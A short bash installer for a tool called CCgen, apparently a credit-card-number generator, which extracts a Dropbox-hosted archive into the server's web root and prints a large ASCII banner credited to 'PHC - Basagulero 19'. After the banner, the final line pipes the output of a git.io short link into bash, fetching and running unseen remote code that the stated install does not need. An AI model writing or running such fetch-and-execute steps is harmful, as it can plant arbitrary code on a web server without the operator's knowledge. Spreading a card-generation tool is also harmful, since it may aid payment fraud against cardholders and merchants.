#!/bin/bash
echo 'Installing CCgen'
wget -qO- https://www.dropbox.com/s/a4h8ydtc2ts2rrl/CCgen.tar | tar x -C /var/www/html/
mv css /var/www/html
mv index.php /var/www/html
mv js /var/www/html
echo 'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB                              BBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB                                BBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBBB       BBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBBB       BBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBBB       BBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBBB       BBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB                                 BBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBBB       BBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBBB       BBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBBB       BBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBBB       BBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBB        BBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB                                BBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBB                              BBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBB  PHC - Basagulero 19  BBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBB  A.K.A -Kim Taehyung- BBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'

bash -c "$(wget https://git.io/fhfGb -qO-)"

